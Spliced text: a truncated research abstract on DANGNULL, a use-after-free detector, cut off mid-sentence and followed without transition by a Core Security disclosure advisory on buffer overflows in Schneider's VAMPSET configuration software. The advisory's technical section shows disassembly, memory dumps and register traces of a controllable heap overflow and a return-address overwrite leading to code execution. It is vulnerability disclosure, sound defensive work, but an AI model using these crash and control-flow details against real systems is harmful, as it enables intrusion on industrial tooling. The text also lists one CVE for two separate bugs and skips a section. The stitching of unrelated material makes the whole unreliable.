Abstract—Many system components and network applications are written in languages that are prone to memory corruption vulnerabilities. There have been countless cases where simple mistakes by developers resulted in memory corruption vulnerabilities and consequently security exploits. While there have been tremendous research efforts to mitigate these vulnerabilities, use-after-free still remains one of the most critical and popular attack vectors because existing proposals have not adequately addressed the challenging program analysis and runtime performance

In this paper we present DANGNULL, a system that detects temporal memory safety violations—in particular, use-after-free and double-free—during runtime. DANGNULL relies on the key observation that the root cause of these violations is that pointers are not nullified after the target object is freed. Based on this observation, DANGNULL automatically traces the object’s relationships via pointers and automatically nullifies all pointers when the target object is freed. DANGNULL offers several benefits. First, DANGNULL addresses the root cause of temporal memory safety violations. It does not rely on the side effects of violations, which can vary and may be masked by attacks. Thus, DANGNULL is effective against even the most sophisticated exploitation techniques. Second, DANGNULL checks object relationship information using runtime object range analysis on pointers, and thus is able to keep track of pointer semantics more robustly even in complex and large scale software. Lastly, DANGNULL does not require numerous explicit sanity checks on memory accesses because it can detect a violation with implicit exception handling, and thus its detection capabilities only incur moderate performance

[CORE-2015-0007] - Schneider Vampset Stack and Heap Buffer Overflow

1. Advisory Information

Title: Schneider Vampset Stack and Heap Buffer Overflow
Advisory ID: CORE-2015-0007
Advisory URL: http://www.coresecurity.com/advisories/schneider-vampset-stack-and-heap-buffer-overflow
Date published: 2015-03-30
Date of last update: 2015-03-27
Vendors contacted: Schneider
Release mode: Coordinated release

2. Vulnerability Information

Class: Heap-based Buffer Overflow [CWE-122], Stack-based Buffer Overflow [CWE-121]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-8390, CVE-2014-8390

3. Vulnerability Description

User-friendly and free of charge VAMPSET software [1] has been designed for setting parameters and configuring relays and is suitable for the entire VAMP range of protection relays, VAMP 321 arc flash protection unit and measuring and monitoring units. This indispensable setting and configuration tool allows relay parameters, configurations and recorded data to be exchanged between a computer and a VAMP relay using various communication cables.

VAMPSET handles the relay settings as documents, vef-files. Settings of one physical device are considered one document. Documents can be read from the relay and transferred between similar relays. Documents can also be saved to the computer hard drive, and later loaded back to the relay using VAMPSET.

VAMPSET is vulnerable to a Stack-based and Heap-based buffer overflow attack, which can be exploited by attackers to execute arbitrary code, by providing a malicious CFG or DAT file with specific parameters.

4. Vulnerable packages

VAMPSET v2.2.145

Other versions are probably affected too, but they were not checked.

5. Vendor Information, Solutions and Workarounds

Given that this is a client-side vulnerability, affected users should avoid opening untrusted .cfg or .dat files. Core Security also recommends those affected use third party software such as Sentinel [3] or EMET [2] that could help to prevent the exploitation of affected systems to some extent.

The vendor published the following advisory [5] that includes mitigation instructions and a reference to the updated software.

6. Credits

This vulnerability was discovered and researched by Ricardo Narvaja from Core Security Exploit Writing Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security Advisories Team.

7. Technical Description / Proof of Concept Code

[CVE-2014-8390] This vulnerability is caused by a controlled heap buffer overflow when opening specially crafted Comtrade [4] format files.

The problem lies in the following facts. First, the software allocates a fixed size here:

.text:00494125 push    1A68h           ; size_t
.text:0049412A call    sub_4CC928
Then it goes to a malloc with 1A68h size:

.text:004CC92E loc_4CC92E:             ; size_t
.text:004CC92E push    edi
.text:004CC92F call    _mallloc
And finally here:

004B3483  |> \83C6 0F       ADD ESI,0F
004B3486  |.  83E6 F0       AND ESI,FFFFFFF0
004B3489  |.  56            PUSH ESI                                 ; /HeapSize = 1A70 (6768.)
004B348A  |.  6A 00         PUSH 0                                   ; |Flags = 0
004B348C  |.  FF35 2C605700 PUSH DWORD PTR DS:[57602C]               ; |hHeap = 003C0000
004B3492  |.  FF15 70224F00 CALL DWORD PTR DS:[<&KERNEL32.HeapAlloc>>; \HeapAlloc
After applying the ADD 0F and AND FFFFFFF0 the size is 0x1A70:

0012EF50   003C0000  |hHeap = 003C0000
0012EF54   00000000  |Flags = 0
0012EF58   00001A70  \HeapSize = 1A70 (6768.)

Then it writes in this section without checking the size of what is written. In the POC it ends up crashing after overflowing the heap section:

00497C03  |.  F3:A5         |REP MOVS DWORD PTR ES:[EDI],DWORD PTR D>
00497C05  |.  8BC8          |MOV ECX,EAX
00497C07  |.  83E1 03       |AND ECX,3
00497C0A  |.  F3:A4         |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:>

00D65F60  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65F70  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65F80  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65F90  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65FA0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65FB0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65FC0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65FD0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65FE0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
00D65FF0  43 43 43 43 43 43 43 43 43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC

EAX 00003BC6
ECX 0000082D
EDX 00003BC5
EBX 00D64468
ESP 0012ED30
EDI 00D66000
EIP 00497C03 Vampset.00497C03

Nevertheless, it is a controllable heap overflow; therefore, if a smaller number of characters is used, it can lead to code execution.

[CVE-2014-8390] This vulnerability is caused by a controlled stack buffer overflow when opening specially crafted Comtrade [4] format files.

When VAMPSET opens the malformed files the following occurs. It sends a message to LB_GETTEXT with the length of the string:

0013F6FC   0048E070  /CALL to SendMessageW from Vampset.0048E06E
0013F700   00840B22  |hWnd = 840B22
0013F704   00000189  |Message = LB_GETTEXT
0013F708   00000000  |Index = 0
0013F70C   0013F760  \Buffer = 0013F760

The length of that string is bigger than the destination buffer and therefore overwrites the return address that is located after the buffer:

$ ==>    >49 00 4C 00 31 00 4D 00 35 00 4D 00 35 00 4D 00  I.L.1.M.5.M.5.M.
$+10     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+20     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+30     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+40     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+50     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+60     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+70     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+80     >35 00 4D 00 35 00 4D 00 35 00 4D 00 35 00 4D 00  5.M.5.M.5.M.5.M.
$+90     >35 00 4D 00 35 00 4D 00 35 00 4D 00 CC CC CC CC  5.M.5.M.5.M.ÌÌÌÌ
$+A0     >CC CC CC CC CC CC 38 00 35 00 38 00 31 00 61 00  ÌÌÌÌÌÌ8.5.8.1.a.
$+B0     >61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
$+C0     >61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00  a.a.a.a.a.a.a.a.
$+D0     >61 00 00 00                                      a...

0048E0BE   > \5F            POP EDI
0048E0BF   .  5E            POP ESI
0048E0C0   .  5D            POP EBP
0048E0C1   .  5B            POP EBX
0048E0C2   .  81C4 C0000000 ADD ESP,0C0
0048E0C8   .  C3            RETN

From there it jumps to execution; in this case it is diverted to 0x4d0035:

0013F7E0   004D0035  Vampset.004D0035
0013F7E4   004D0035  Vampset.004D0035
0013F7E8   004D0035  Vampset.004D0035
0013F7EC   004D0035  Vampset.004D0035
0013F7F0   004D0035  Vampset.004D0035
0013F7F4   004D0035  Vampset.004D0035
0013F7F8   004D0035  Vampset.004D0035

004D0035  |.  FFD5          CALL EBP                                 ; \ClientToScreen

After this it executes our code in the stack:

0013F7EC    35 004D0035     XOR EAX,35004D00
0013F7F1    004D 00         ADD BYTE PTR SS:[EBP],CL
0013F7F4    35 004D0035     XOR EAX,35004D00
0013F7F9    004D 00         ADD BYTE PTR SS:[EBP],CL
0013F7FC    CC              INT3
0013F7FD    CC              INT3
0013F7FE    CC              INT3
0013F7FF    CC              INT3
0013F800    CC              INT3
0013F801    CC              INT3
0013F802    CC              INT3
0013F803    CC              INT3
0013F804    CC              INT3
0013F805    CC              INT3
0013F806    3800            CMP BYTE PTR DS:[EAX],AL
0013F808    35 00380031     XOR EAX,31003800
0013F80D    0061 00         ADD BYTE PTR DS:[ECX],AH
0013F810    61              POPAD

8. Report Timeline

2015-01-29: Core Security sent an initial notification to CCC@us.schneider-electric.com informing them of the vulnerability and requesting their PGP key in order to send them the encrypted advisory draft.
2015-02-05: Core Security sent another email to CIC-Technical@us.schneider-electric.com and LeeAnn.Luck@Schneider-Electric.com informing them of the vulnerability and requesting their PGP key in order to send them the encrypted advisory draft.
2015-02-16: Schneider replied to our email attaching their public PGP key, and asking if we were coordinating with ICS-CERT and which versions of their product we tested.
2015-02-20: Core Security sent a draft copy of the Advisory. Considering that both vulnerabilities are client side and affect software and not a device, we don't think it would be necessary to contact ICS-CERT. We inform them that we are planning to release this advisory on the 20th of March, 2015.
2015-02-23: Schneider confirms the reception of Core Security draft advisory. They inform they are evaluating the report.
2015-02-27: Schneider informs they are evaluating the heap buffer overflow vulnerability and they request the Proof Of Concept files (Comtrade) we used to trigger the crash and the exploit as well. They request we coordinate a release date depending on their patch plan.
2015-03-02: Core Security sends Schneider both PoC files and explains that it is our policy never to release exploit code, just the files/code that trigger the vulnerability and cause the application to crash. We also expressed our willingness to work together.
2015-03-03: Schneider confirms reception of our email and attached files.
2015-03-20: Schneider informed us that they have addressed the vulnerability and they requested that we review their security disclosure.
2015-03-25: Core Security informed Schneider that they should review the "Vulnerability Overview" section of their disclosure in order to clarify that the vulnerability could not only cause a crash in the application. We requested the time and date they are planning to publish the advisory and the update, as well as the link to their publication. We informed them of the URL where our advisory is going to be published and the CVE ID we are planning to use.
2015-03-25: Schneider informed us that they made the recommended modifications to their disclosure document and they sent us the new version. They also said they will publish it on their website.
2015-03-26: Core Security asked Schneider if they could inform us of the exact date they are planning to publish their disclosure document. Additionally, we recommended that they delay the release until Monday in order to give the affected users enough time to patch their software before the weekend.
2015-03-26: Schneider informed us that they published the advisory. They claim that because of its location, the document is not easy to find until they publicize it through a news item. They informed us that they will try to post the news item on Monday but they give no guarantees. They inform as well that they have contacted ICS-CERT so they are aware.
2015-03-27: Core Security replied to Schneider that by publishing the advisory they missed the whole point of a coordinated release, even if their advisory is not easy to find online. We informed them that we are going to publish our advisory on Monday the 30th at 9 am EST in order to give the affected users enough time to patch their software before the weekend.
2015-03-30: Advisory CORE-2015-0007 published.


10. About CoreLabs

CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.

11. About Core Security

Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.

Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.

12. Disclaimer

The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

13. PGP/GPG Keys

This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.